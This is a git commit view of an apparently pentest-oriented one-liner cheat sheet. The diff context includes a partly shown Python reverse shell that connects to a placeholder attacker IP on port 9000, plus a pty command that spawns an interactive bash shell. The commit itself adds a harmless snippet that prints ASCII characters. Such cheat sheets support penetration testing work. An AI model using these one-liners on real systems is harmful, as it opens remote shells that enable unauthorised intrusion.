Added one liners from @pentestcli

This commit is contained in:
tekwizz123
2013-12-17 20:27:03 +00:00
parent f3ce98b2ca
commit 8641c23a10
5 changed files with 117 additions and 3 deletions

View File

@@ -17,4 +17,8 @@ python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.sock
**Spawn bash shell prompt**
```python
python -c 'import pty; pty.spawn("/bin/bash")'```
python -c 'import pty; pty.spawn("/bin/bash")'```
***Print all ASCII characters***
```python
python -c 'import string; print string.printable'```